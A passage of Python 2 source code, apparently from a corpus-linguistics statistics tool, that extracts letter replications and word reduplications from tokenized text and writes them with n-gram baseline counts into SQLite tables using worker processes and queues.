#self.logger.info("Current StatsDB has '{}' rows in the Baseline Table.".format(uniq_syntagma_in_baseline))
self._last_insertion_was_successfull = True
self._end_time_of_the_last_insertion = time.time()
#p("333",c="m")
self.statsdb._commit(write_all_cash=True)
if create_indexes:
self.statsdb.init_default_indexes(thread_name=thread_name)
self.create_additional_indexes(optimized_for_long_syntagmas=optimized_for_long_syntagmas)
self.statsdb._commit(write_all_cash=True)
if not self._check_baseline_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
if freeze_db:
self.optimize_db(stream_number=stream_number, min_row_pro_sream=min_files_pro_stream)
self.statsdb._commit(write_all_cash=True)
self._compute_baseline_sum()
if not self._check_statsdb_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
#p("DONE---")
if len(self.threads_unsuccess_exit) >0:
self.logger.error("StatsComputational process is failed. (some thread end with error)")
raise ProcessError, "'{}'-Threads end with an Error.".format(len(self.threads_unsuccess_exit))
#self.statsdb.update_attr("locked", False)
return False
else:
self.logger.info("StatsComputational process end successful!!!")
self.statsdb.update_attr("locked", False)
self.statsdb._commit(write_all_cash=True)
return True
# except Exception as e:
# print_exc_plus() if self._ext_tb else ""
# self.logger.error("ComputeError: See Exception: '{}'. ".format(repr(e)), exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
# except KeyboardInterrupt:
# self.logger.warning("KeyboardInterrupt: Process was stopped from User. Some inconsistence in the current DB may situated.")
# sys.exit()
def _compute(self, pipe_reciever, sender,db_writer,status_bar_insertion_in_the_current_thread,datatyp="dict", thread_name="Thread0", baseline_insertion_border=1000000,add_also_repeted_redu_to_baseline=True):
#try:
if not self._check_corp_should_exist():
self._terminated.value = True
msg = "StatsObj wasn't found."
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if not self._corp_info:
self._terminated.value = True
msg = "CorpInfo wasn't found."
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
self._initialisation_computation_process(thread_name=thread_name)
#_init_status_bar_for_current_thread(pipe_reciever, thread_name="Thread0"):
#if self._status_bar:
# if not status_bar_insertion_in_the_current_thread: return False
self.logger.debug("_ComputationalProcess: Was started for '{}'-Thread. ".format(thread_name))
i = 0
#for doc_elem in pipe_reciever:
pipe_reciever.send("+")
while True:
#try:
#doc_elems = pipe_reciever.recv()
doc_elem = pipe_reciever.recv()
#p(doc_elem, "RECIEVER"+thread_name, )
#except IOError:
# break
if not doc_elem:
if doc_elem is False:
pipe_reciever.send("+")
continue
elif doc_elem is None:
sender.terminate()
del sender
pipe_reciever.close()
break
#doc_elem = pipe_reciever.recv()
else:
continue
#for doc_elem in doc_elems:
#for doc_elem in pipe_reciever:
self._check_termination(thread_name=thread_name)
i+= 1
#p(self._status_bar, "self._status_bar")
#p("INCR","STATUSBAR"+thread_name)
if self._status_bar:
status_bar_insertion_in_the_current_thread.update(incr=1)
status_bar_insertion_in_the_current_thread.refresh()
if self.main_status_bar_of_insertions:
self.main_status_bar_of_insertions.update(incr=1)
#self.main_status_bar_of_insertions.refresh()
text_elem = json.loads(doc_elem[1])
#p((sum([len(s[0]) for s in text_elem]), "doc_elem"))
if self._force_cleaning:
text_elem = self._preprocess(text_elem,thread_name=thread_name)
#p(text_elem, c="m")
### Extraction
extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container = self.extract_replications(text_elem, thread_name=thread_name)
#p((extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container), "REPLS")
extracted_redu_in_text_container, redu_free_text_container, mapping_redu = self.extract_reduplications(repl_free_text_container, rle_for_repl_in_text_container, thread_name=thread_name)
#p((extracted_redu_in_text_container, redu_free_text_container, mapping_redu), "REDUS")
computed_baseline = self.compute_baseline(redu_free_text_container,extracted_redu_in_text_container)
stemmed_text_container = [[self.stemm(token) for token in sent] for sent in redu_free_text_container]
#p(stemmed_text_container, "stemmed_text_container")
### Insertion
self.insert_repl_into_db(db_writer,doc_elem,text_elem,extracted_repl_in_text_container, repl_free_text_container,rle_for_repl_in_text_container,redu_free_text_container,mapping_redu,stemmed_text_container, thread_name=thread_name)
self.insert_redu_into_db(db_writer,doc_elem,text_elem,extracted_redu_in_text_container, redu_free_text_container, rle_for_repl_in_text_container, repl_free_text_container, mapping_redu,stemmed_text_container,thread_name=thread_name)
#if "@ronetejaye" in [t for sent in redu_free_text_container for t in sent]:
# p((doc_elem,redu_free_text_container,repl_free_text_container), "doc_elem")
#with self.locker:
self.baseline_lazyinsertion_into_db(db_writer,computed_baseline,extracted_redu_in_text_container,baseline_insertion_border=baseline_insertion_border,thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"replications",thread_name,NULL=True)
self._send_data_to_dbwriter(db_writer,"reduplications",thread_name,NULL=True)
self._send_data_to_dbwriter(db_writer,"baseline", thread_name,NULL=True)
if self._status_bar:
status_bar_insertion_in_the_current_thread.refresh()
self.counters_attrs["_compute"][thread_name]["start"] = status_bar_insertion_in_the_current_thread.start
self.counters_attrs["_compute"][thread_name]["end"] = status_bar_insertion_in_the_current_thread.last_update
self.counters_attrs["_compute"][thread_name]["total"] = status_bar_insertion_in_the_current_thread.total
self.counters_attrs["_compute"][thread_name]["desc"] = status_bar_insertion_in_the_current_thread.desc
status_bar_insertion_in_the_current_thread.close(clear=False)
#p("STOP", thread_name,c="r")
self.threads_status_bucket.put({"name":thread_name, "status":"done"})
#p("STOP", thread_name,c="r")
#self.threads_status_bucket.put("JUHUHUHU")
self.logger.debug("_Compute: '{}'-Thread is done and was stopped.".format(thread_name))
return True
# except Exception as e:
# print_exc_plus() if self._ext_tb else ""
# msg = "_ComputeError: See Exception: '{}'. ".format(repr(e))
# self.logger.error(msg, exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
# self.statsdb.rollback()
# return False
def _send_data_to_dbwriter(self,db_writer, table_name,thread_name,NULL=False):
if table_name == "reduplications":
db_writer.put(("reduplications",self.temporized_redu[thread_name] ,thread_name))
if NULL:
db_writer.put(("reduplications",None ,thread_name))
del self.temporized_redu[thread_name]
self.temporized_redu[thread_name] = []
elif table_name == "replications":
db_writer.put(("replications",self.temporized_repl[thread_name] ,thread_name))
if NULL:
db_writer.put(("replications",None ,thread_name))
del self.temporized_repl[thread_name]
self.temporized_repl[thread_name] = []
else:
db_writer.put(("baseline", self.temporized_baseline,thread_name))
if NULL:
db_writer.put(("baseline", None,thread_name))
del self.temporized_baseline
self.temporized_baseline= defaultdict(int)
#del data_to_send
gc.collect()
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def _db_multiproc_writer(self, active_queue,stream_number):
counter_closed = defaultdict(int)
#c = 0
#c1 = 0
while True:
if self._terminated.value:
break
#sys.exit()
#result = pipe.recv()
if active_queue.empty():
time.sleep(0.1)
if self._close_db_writer.value:
break
continue
result = active_queue.get()
#if sum(counter_closed.values())/float(3) == float(stream_number):
# p(sum(counter_closed.values())/float(3))
# active_queue.close()
# break
data_to_write = result[1]
table_name = result[0]
thread_name = result[2]
#p((table_name, thread_name), "data_to_write",c="m")
if not data_to_write:
del result
#c1 += 1
counter_closed[table_name] += 1
#p(counter_closed, "counter_closed",c="r")
continue
if table_name == "replications":
#c+= 1
self._write_repl_into_db(data_to_write,thread_name=thread_name)
elif table_name == "reduplications":
#c+= 1
self._write_redu_into_db(data_to_write,thread_name=thread_name)
else:
#c+= 1
self._baseline_insert_temporized_data(data_to_write,thread_name=thread_name)
del result
del data_to_write
gc.collect()
#p((c,c1), "CCCC", c="r")
#p(counter_closed, "counter_closed",c="r")
sys.exit()
def _write_repl_into_db(self,data_to_write,thread_name="Thread0"):
#thread_name =
placeholders = ', '.join('?'*len(self._repls_cols))
query = "INSERT or IGNORE INTO main.replications VALUES ({});".format(placeholders)
#p((query,placeholders),"query")
#p(self.temporized_repl[thread_name][0])
#p(len(self.temporized_repl[thread_name][0]))
self.statsdb._threads_cursors[thread_name].executemany(query,data_to_write )
self.temporized_repl[thread_name] = []
def _write_redu_into_db(self,data_to_write,thread_name="Thread0"):
#thread_name =
placeholders = ', '.join('?'*len(self._redus_cols))
query = "INSERT or IGNORE INTO main.reduplications VALUES ({});".format(placeholders)
#p((query,placeholders),"query")
#p(self.temporized_redu[thread_name][0])
#p(len(self.temporized_redu[thread_name][0]))
self.statsdb._threads_cursors[thread_name].executemany(query,data_to_write )
self.temporized_redu[thread_name] = []
def _baseline_insert_temporized_data(self,temporized_baseline,thread_name="Thread0"):
try:
#self.logger.low_debug("Insertion Process of temporized Baseline was started")
qeary = """
INSERT OR REPLACE INTO baseline VALUES (
:0,
:1,
:2,
COALESCE((SELECT occur_syntagma_all FROM baseline WHERE syntagma=:0), 0) + :3,
NULL,NULL,NULL,NULL,NULL,NULL
);"""
cursor = self.statsdb._db.cursor()
def intern_gen():
for syntag, count in temporized_baseline.iteritems():
#print syntag
#self.logger.error("{}".format(syntag))
#sys.exit()
yield (
self._baseline_delimiter.join(syntag).strip(),
self._baseline_delimiter.join([self.stemm(w) for w in syntag]).strip(),
len(syntag),
count,
)
cursor.executemany(qeary, intern_gen() )
self.logger.low_debug("Temporized Baseline was inserted into DB.")
return True
except Exception as e:
self.logger.error("INsertionError: {}".format(repr(e)), exc_info=self._logger_traceback)
self.terminated = True
return False
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def _get_occur(self,counted_rep, scope=1,splitted_syntagma=False):
if scope>1:
#if
occur_uniq = defaultdict(lambda:0)
occur_rep_exhausted = defaultdict(lambda:0)
for word, word_data in counted_rep.iteritems():
for doc_id, doc_data in word_data.iteritems():
for rep_count in doc_data.values():
occur_uniq[word] += 1
occur_rep_exhausted[word] += rep_count
if splitted_syntagma:
occur_uniq_output = ()
occur_e_output = ()
#tuple(occur_uniq[word] for word in splitted_syntagma )
for word in splitted_syntagma:
occur_uniq_output += (occur_uniq[word],)
occur_uniq[word] = "IGNOR"
occur_e_output += (occur_rep_exhausted[word],)
occur_rep_exhausted[word] = "IGNOR"
return (occur_uniq_output,occur_e_output)
else:
return (sum(occur_uniq.values()),sum(occur_rep_exhausted.values()) )
else:
occur_uniq = 0
occur_rep_exhausted = 0
for doc_id, doc_data in counted_rep.iteritems():
for rep_count in doc_data.values():
occur_uniq += 1
occur_rep_exhausted += rep_count
return (occur_uniq,occur_rep_exhausted)
def _insert_temporized_sum_into_baseline_table_in_db(self,temporized_sum,tables_name, ):
placeholders = " ,".join(["?" for i in range(len(temporized_sum[0]))])
qeary = """
INSERT OR REPLACE INTO {} VALUES ({});
"""
self.statsdb._threads_cursors["sum_inserter"].executemany(qeary.format(tables_name,placeholders), temporized_sum)
def recompute_syntagma_repetativity_scope(self, full_repetativ_syntagma,_check_statsdb_consistency=True):
values_from_db = self.statsdb.get_attr("full_repetativ_syntagma")
if full_repetativ_syntagma not in [True, False]:
self.logger.error("A non-boolean symbol ('{}') was given as full_repetativ_syntagma-Option. ".format(full_repetativ_syntagma))
return False
if full_repetativ_syntagma == values_from_db:
self.logger.warning("There is nothing to recompute. Values for 'full_repetativ_syntagma' was given: '{}' and values in StatsDB is '{}'.".format(full_repetativ_syntagma, values_from_db))
return False
# if self._full_repetativ_syntagma and self._db_frozen and full_repetativ_syntagma == False:
# self.logger.warning("Recomputing from True->False is failed!!! Because this StatsDB was already optimized and all not-full-repetativ-syntagmas was already deleted during this process.")
# return False
if self.statsdb.get_attr("locked"):
self.logger.error("Current DB is still be locked. Possibly it in ht now fr in-useom other process or la thest computation process is failed.")
return False
self.statsdb.update_attr("locked", True)
self.statsdb.update_attr("full_repetativ_syntagma", full_repetativ_syntagma)
self.set_all_intern_attributes_from_db()
if self._compute_baseline_sum():
self.logger.info("StatsDB FullSyntagmaRepetativnes was recompute with success.")
if _check_statsdb_consistency:
if not self._check_baseline_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
if not self._check_statsdb_consistency():
self.logger.error("StatsDBCorrupt: Current StatsDB is inconsistent.")
return False
else:
self.logger.error("FullRepetativnes wasn't recompute.")
return False
self.statsdb.update_attr("locked", False)
return True
#self.statsdb.update_attr("full_repetativ_syntagma", full_repetativ_syntagma)
def _compute_baseline_sum(self, insertion_border=10000, thread_name="Thread0",size_to_fetch=10000, ):
if not self._check_stats_db_should_exist():
return False
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("RepetitionSummarizing") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "Processed:", "syntagma")
# ### compute syntagmas to delete
counter_summerized = 0
temporized_sum = []
temp_rep = defaultdict()
minimum_columns = False
syntagma_type = "lexem"
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#### Compute indexes
ix_repl = indexes["repl"]
ix_redu = indexes["redu"]
ix_word_redu = ix_redu['normalized_word']
ix_word_repl = ix_repl['normalized_word']
ix_token_redu = ix_redu["index_in_corpus"]
ix_token_repl = ix_repl["index_in_corpus"]
ix_length_redu = ix_redu["redu_length"]
#ix_in_redu_repl = ix_repl["in_redu"]
ix_doc_id_redu = ix_redu["doc_id"]
ix_doc_id_repl = ix_repl["doc_id"]
row_num_bevore = self.statsdb.rownum("baseline") +1000
#for i, baseline_container in enumerate(self._baseline("*",max_scope=False, split_syntagma=False,thread_name="baseline_getter")):
#gen = self.statsdb.lazyget("baseline", thread_name="baseline_sum")
# def intern_gen():
# gen = self.statsdb._threads_cursors["baseline_getter"].execute("SELECT * FROM baseline;") #lazyget("baseline", thread_name="baseline_sum")
# while True:
# results = gen.fetchmany(size_to_fetch)
# results = list(results)
# if not results:
# break
# for row in results:
# yield row
### create_temp_table
#self.statsdb._threads_cursors["baseline_creater"].execute("CREATE TABLE 'temp_baseline' AS SELECT sql FROM sqlite_master WHERE type='table' AND name='baseline'" ).fetchall()
self.statsdb._commit(write_all_cash=True)
self._temp_baseline_name = "_baseline"
status = self.statsdb.addtable(self._temp_baseline_name, db_helper.default_columns_and_types_for_stats_baseline ,constraints= db_helper.default_constraints_for_stats_baseline)
self.statsdb._commit(write_all_cash=True)
for i, baseline_container in enumerate(self.statsdb.lazyget("baseline", thread_name="baseline_sum")):
if i >row_num_bevore:
self.logger.error("InvalidState: BaselineGetter send more items as need. Script is failed! ( Probably an ImplementationsError. Please contact Egor Savin: ego@savin.berlin) ")
sys.exit()
#return
#p(baseline_container, "baseline_container")
if self._status_bar:
status_bar_current.update(incr=1)
#inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type)
unsplitted_syntagma = baseline_container[0]
splitted_syntagma = unsplitted_syntagma.split(self._baseline_delimiter)
#p(baseline_container,"baseline_container")
scope = len(splitted_syntagma)
where = tuple(self._get_where_statement(splitted_syntagma,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type="lexem"))#, splitted_syntagma=splitted_syntagma)
if not where: return False
repls_container = self.get_reps("repl",splitted_syntagma,scope,where,indexes,thread_name=thread_name,return_full_tuple=True,
delete_duplicates=False,syntagma_type=syntagma_type, minimum_columns=minimum_columns)
redus_container = self.get_reps("redu",splitted_syntagma,scope,where,indexes,thread_name=thread_name,return_full_tuple=True,
delete_duplicates=False,syntagma_type=syntagma_type, minimum_columns=minimum_columns)
temp_baseline_row = baseline_container[:4]
#p((repls_container, redus_container, temp_baseline_row))
if repls_container or redus_container:
counter_summerized += 1
occur_full_syn_repl = None
occur_full_syn_redu = None
if scope==1:
if repls_container:
repls =repls_container[0]
temp_repl = defaultdict(lambda:defaultdict(int))
for repl in repls:
temp_repl[repl[ix_doc_id_repl]][repl[ix_token_repl]] += 1
occur = self._get_occur(temp_repl)
temp_baseline_row += occur
occur_full_syn_repl = occur[0]
else:
temp_baseline_row += (None,None)
if redus_container:
redus = redus_container[0]
temp_redu = defaultdict(lambda:defaultdict(int))
for redu in redus:
temp_redu[redu[ix_doc_id_redu]][redu[ix_token_redu]] += redu[ix_length_redu]
occur = self._get_occur(temp_redu)
temp_baseline_row += occur
occur_full_syn_redu = occur[0]
else:
temp_baseline_row += (None,None)
temp_baseline_row += (occur_full_syn_repl,occur_full_syn_redu)
else:
occur_full_syn_repl = None
occur_full_syn_redu = None
#p((baseline_container[0],data),"data")
if repls_container:
repls =repls_container[0]
#p(repls_container, "repls_container")
counted_repls = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
for repl in repls:
#p(repl[3], "repl[3]")
counted_repls[repl[ix_word_repl]][repl[ix_doc_id_repl]][repl[ix_token_repl]] += 1 #. if not in_redu, that each repl will be counted
#p(counted_repls,"counted_repls")
temp_baseline_row += self._get_occur(counted_repls,scope=scope,splitted_syntagma=splitted_syntagma)
occur_full_syn_repl = repls_container[2] if repls_container[1] else None
else:
temp_baseline_row += (None,None)
if redus_container:
redus = redus_container[0]
counted_redus = defaultdict(lambda:defaultdict(lambda:defaultdict(int)))
for redu in redus:
counted_redus[redu[ix_word_redu]][redu[ix_doc_id_redu]][redu[ix_token_redu]] += redu[ix_length_redu]
#p(counted_redus, "counted_redus")
temp_baseline_row += self._get_occur(counted_redus,scope=scope,splitted_syntagma=splitted_syntagma)
occur_full_syn_redu = redus_container[2] if redus_container[1] else None
else:
temp_baseline_row += (None,None)
temp_baseline_row += (occur_full_syn_repl, occur_full_syn_redu)
temporized_sum.append(db_helper.values_to_list( temp_baseline_row, "one"))
#self.statsdb._threads_cursors["sum_inserter"].execute(qeary.format(self._temp_baseline_name,placeholders), db_helper.values_to_list( temp_baseline_row, "one") )
if len(temporized_sum) > self._lazyness_border:
self._insert_temporized_sum_into_baseline_table_in_db(temporized_sum,self._temp_baseline_name)
temporized_sum = []
if len(temporized_sum) > 0:
self._insert_temporized_sum_into_baseline_table_in_db(temporized_sum,self._temp_baseline_name)
temporized_sum = []
self.statsdb._threads_cursors["baseline_creater"].execute("DROP TABLE {};".format("baseline") )
self.statsdb._commit(write_all_cash=True)
self.statsdb._threads_cursors["baseline_creater"].execute("ALTER TABLE {} RENAME TO baseline;".format(self._temp_baseline_name) ) # #
self.statsdb._commit(write_all_cash=True)
self.statsdb._update_temp_indexesList_in_instance(thread_name=thread_name)
#self.statsdb._update_database_pragma_list(thread_name=thread_name)
self.statsdb._update_pragma_table_info(thread_name=thread_name)
self.statsdb._update_temp_tablesList_in_instance(thread_name=thread_name)
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Syntagmas: Processed:'{}'; Summerized:'{}';".format(status_bar_current.count, counter_summerized) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if counter_summerized > 0:
self.logger.info("All Syntagmas was counted and summerized.")
return counter_summerized
else:
self.logger.info("No one Syntagmas summerized.")
return False
def _set_rle(self, thread_name="Thread0"):
try:
self.logger.debug("INIT-RLE: Start the initialization of Run_length_encoder for '{}'-Thread.".format(thread_name))
self.preprocessors[thread_name]["rle"] = self.mgr.Rle()
#p(type(self.preprocessors[thread_name]["rle"]))
#p(self.preprocessors[thread_name]["rle"])
#p(repr(self.preprocessors[thread_name]["rle"]))
#p(self.preprocessors[thread_name]["rle"].del_rep("ggggklölkrtuiiiggjk"))
#p(self.preprocessors)
self.logger.debug("INIT-RLE: Run_length_encoder for '{}'-Thread was initialized.".format(thread_name))
return True
except Exception as e:
self.logger.error("Exception was encountered: '{}'. ".format(repr(e)), exc_info=self._logger_traceback)
return False
def _init_preprocessors(self, thread_name="Thread0"):
try:
if not self._set_rle(thread_name):
self.logger.error("RLE in '{}'-Thread wasn't initialized. Script will be aborted.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
return False
# if self._status_bar:
# status_bar_preprocessors_init = self._get_new_status_bar(1, "{}:PreprocessorsInit".format(thread_name), "unit")
# if self._set_rle(thread_name):
# if self._status_bar:
# status_bar_preprocessors_init.update(incr=1)
# status_bar_preprocessors_init.refresh()
# else:
# status_bar_preprocessors_init.total -= 1
# self.logger.error("RLE in '{}'-Thread wasn't initialized. Script will be aborted.".format(thread_name), exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
# return False
# if self._status_bar:
# self.counters_attrs["_init_preprocessors"][thread_name]["start"] = status_bar_preprocessors_init.start
# self.counters_attrs["_init_preprocessors"][thread_name]["end"] = status_bar_preprocessors_init.last_update
# self.counters_attrs["_init_preprocessors"][thread_name]["total"] = status_bar_preprocessors_init.total
# self.counters_attrs["_init_preprocessors"][thread_name]["desc"] = status_bar_preprocessors_init.desc
self.logger.debug("PreprocessorsInit: All Preprocessors for '{}'-Thread was initialized.".format(thread_name))
return True
except Exception, e:
print_exc_plus() if self._ext_tb else ""
self.logger.error("PreprocessorsInitError: See Exception: '{}'. ".format(e), exc_info=self._logger_traceback)
return False
def _compute_cleaning_flags(self):
if not self.force_cleaning_flags:
if not self._corp_info["del_url"]:
if self._ignore_url:
self.force_cleaning_flags.add("URL")
if not self._corp_info["del_hashtag"]:
if self._ignore_hashtag:
self.force_cleaning_flags.add("hashtag")
if not self._corp_info["del_mention"]:
if self._ignore_mention:
self.force_cleaning_flags.add("mention")
if not self._corp_info["del_punkt"]:
if self._ignore_punkt:
self.force_cleaning_flags.add("symbol")
if not self._corp_info["del_num"]:
if self._ignore_num:
self.force_cleaning_flags.add("number")
# = {
# "number":":number:",
# "URL":":URL:",
# "symbol":":symbol:",
# "mention":":mention:",
# "hashtag":":hashtag:",
# }
def _preprocess(self, text_elem,thread_name="Thread0"):
#p(text_elem, "text_elem", c="r")
#time.sleep(3)
#p(text_elem, "text_elem")
new_text_elem = []
for sent_container in text_elem:
#p(sent_container, "sent_container")
sent = sent_container[0]
#p(sent, "sent")
sentiment = sent_container[1]
#categories = get_categories([token[0] for token in sent])
#p(categories, "categories")
temp_sent = []
#i = -1å
for token_container in sent:
#p(token_container, "token_container")
#i+=1
categorie = token_container[1]
if categorie in self.force_cleaning_flags:
if self._log_ignored:
self.logger.outsorted_stats("Following Token was ignored: '{}'. Reason: 'It is an URL'.".format(token_container))
#indexes_to_del.append((index_level_1, index_level_2, index_level_3))
temp_sent.append((None,self._cleaned_tags[categorie]))
continue
#p(token_container)
if not self._case_sensitiv:
temp_sent.append((token_container[0].lower(), token_container[1]))
else:
temp_sent.append(token_container)
#p([token_container[0],token_container[1], i])
#p(temp_sent, "temp_sent")
new_text_elem.append((temp_sent, sentiment))
#p((temp_sent), "temp_sent", c="r")
#self.logger.debug("Text-Cleaning for current text_elem is done.")
#p(new_text_elem, "new_text_elem",c="r")
#sys.exit()
return new_text_elem
def extract_reduplications(self,repl_free_text_container,rle_for_repl_in_text_container, thread_name="Thread0"):
#self.logger.low_debug("ReduExtraction was started")
extracted_redu_in_text_container = []
redu_free_text_container = []
text_elem_mapping = []
mapping_redu = []
#p(text_elem, "text_elem")
#p(repl_free_text_container, "repl_free_text_container")
sent_index = -1
#total_sent_number = len(repl_free_text_container)
#p(total_sent_number,"total_sent_number")
for sent in repl_free_text_container:
########### SENTENCE LEVEL ##################
sent_index+= 1
#p(sent, "sent")
repl_in_tuples, mapped = self.preprocessors[thread_name]["rle"].encode_to_tuples(sent,mapping=True)
#p(repl_in_tuples, "repl_in_tuples")
extracted_reps, rep_free_sent = self.preprocessors[thread_name]["rle"].rep_extraction_sent(repl_in_tuples,mapped)
#redu_free_index = -1
for rep in extracted_reps:
#redu_free_index += 1
start_index = rep['start_index_in_orig']
length = rep['length']
i_redu_free = rep["index_in_redu_free"]
repl_free_range = repl_free_text_container[sent_index][start_index:start_index+length]
rle_range = rle_for_repl_in_text_container[sent_index][start_index:start_index+length]
addit_info = []
#p((, ))
#p(repl_free_range, "repl_free_range")
#p(rle_range, "rle_range")
addit_info = [r if r else o for o,r in zip(repl_free_range,rle_range)]
#addit_info = [r if (r,o[1]) else o for o,r in zip(orig_range,rle_range)]
#p(addit_info, "addit_info", c="r")
counts = Counter(addit_info)
#p(counts, "counts")
rep_free_sent[i_redu_free] = (rep_free_sent[i_redu_free], dict(counts))
#p((extracted_reps, rep_free_sent), c="r")
#p(rep_free_sent, "rep_free_sent")
extracted_redu_in_text_container.append(extracted_reps)
redu_free_text_container.append(rep_free_sent)
mapping_redu.append(mapped)
#sys.exit()
#self.logger.low_debug("ReduExtraction was finished")
return extracted_redu_in_text_container, redu_free_text_container, mapping_redu
def extract_replications(self, text_elem, thread_name="Thread0"):
#self.logger.low_debug("ReplExtraction was started")
repl_free_text_container = []
rle_for_repl_in_text_container = []
extracted_repl_in_text_container = []
#p(text_elem)
sent_index = -1
total_sent_number = len(text_elem)
for sent_container in text_elem:
########### SENTENCE LEVEL ##################
repl_free_text_container.append([])
rle_for_repl_in_text_container.append([])
extracted_repl_in_text_container.append([])
sent_index+= 1
#p((type(sent_container),sent_container), "sent_container_in_repl_extr")
try:
sent = sent_container[0]
sentiment = sent_container[1]
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given SentContainer has wrong structure! SentContainer: '{}'; Exception: '{}'.".format(sent_container,e)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if not self._case_sensitiv:
sent = [[token_container[0].lower(), token_container[1]] if token_container[0] else token_container for token_container in sent ]
temp_sent = []
token_index = -1
for token_container in sent:
token_index+=1
try:
token = token_container[0]
pos = token_container[1]
#nr_of_token_in_sent = token_index
except Exception, e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given TokenContainer has wrong structure! '{}'.".format(token_container)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if pos not in self.ignored_pos:
if token:
repl_in_tuples = self.preprocessors[thread_name]["rle"].encode_to_tuples(token)
extracted_reps, rep_free_word,rle_word = self.preprocessors[thread_name]["rle"].rep_extraction_word(repl_in_tuples, get_rle_as_str=True)
#p((repl_in_tuples,extracted_reps, rep_free_word,rle_word))
else:
#p((pos, token))
rep_free_word = pos
extracted_reps = None
repl_free_text_container[sent_index].append(rep_free_word)
if extracted_reps:
#p((extracted_reps, rep_free_word,rle_word),c="r")
rle_for_repl_in_text_container[sent_index].append(rle_word)
extracted_repl_in_text_container[sent_index].append(extracted_reps)
else:
rle_for_repl_in_text_container[sent_index].append("")
extracted_repl_in_text_container[sent_index].append("")
else:
repl_free_text_container[sent_index].append(token)
rle_for_repl_in_text_container[sent_index].append("")
extracted_repl_in_text_container[sent_index].append("")
#p((sent_index,token_index, repl_free_text_container[sent_index][token_index],rle_for_repl_in_text_container[sent_index][token_index] ,extracted_repl_in_text_container[sent_index][token_index]))
#p(repl_free_text_container, "repl_free_text_container")
#self.logger.low_debug("ReplExtraction was finished")
return extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container
def _get_cleaned_redu_free(self, redu_free_text_container):
inp_token_list = []
for sent in redu_free_text_container:
for token in sent:
try:
token[1].values
inp_token_list.append(token[0])
except (IndexError,AttributeError):
inp_token_list.append(token)
return inp_token_list
def compute_baseline(self, redu_free_text_container,extracted_redu_in_text_container):
#self.logger.low_debug("Baseline Computation for current text-element was started")
## Step 1: Extract ngramm from redu and repl free text element
inp_token_list = self._get_cleaned_redu_free(redu_free_text_container)
computed_baseline = []
for n in xrange(1,self.baseline_ngramm_lenght+1):
computed_baseline += [tuple(inp_token_list[i:i+n]) for i in xrange(len(inp_token_list)-n+1)]
## Step 2: Add reduplicated unigramms
#self.logger.low_debug("Baseline Computation was finished.")
return computed_baseline
# def baseline_intime_insertion_into_db(self,thread_name="Thread0"):
# temporized_baseline_to_insert = self.temporized_baseline
# self.temporized_baseline = defaultdict(int)
# thread_name = "basinsrt"
# if self.baseline_insrt_process:
# try:
# i = 0
# while True:
# #a = self.baseline_insrt_process.isAlive()
# #p(a, "isalive")
# i += 1
# if not self.baseline_insrt_process.isAlive():
# self.logger.debug("Waiting is finished -> (BaselineInsertion will be start)")
# break
# else:
# if i >= 50:
# self.logger.error("Timeout limit was reached. Probably something goes wrong!!!!")
# self.terminated = True
# sys.exit()
# self.logger.debug("Wait till BaselineInsertion is done.")
# time.sleep(1)
# except AttributeError:
# pass
# #p("5555")
# self.baseline_insrt_process = threading.Thread(target=self.baseline_insert_temporized_data, args=(temporized_baseline_to_insert, thread_name), name=thread_name)
# self.baseline_insrt_process.setDaemon(True)
# self.baseline_insrt_process.start()
# #time.sleep(5)
# def baseline_insert_left_over_data(self,thread_name="Thread0"):
# thread_name = "basinsrt"
# # p("111")
# if self.baseline_insrt_process:
# # p("222")
# i = 0
# try:
# while True:
# i += 1
# #a = self.baseline_insrt_process.isAlive()
# #p(a, "isalive")
# if not self.baseline_insrt_process.isAlive():
# self.logger.debug("Waiting is finished -> (BaselineInsertion will be start)")
# break
# else:
# if i >= 50:
# self.logger.error("Timeout limit was reached. Probably something goes wrong!!!!")
# self.logger.debug("Wait till BaselineInsertion is done.")
# time.sleep(1)
# except AttributeError:
# pass
# #p("5555")
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# def baseline_intime_insertion_into_db(self,thread_name="Thread0"):
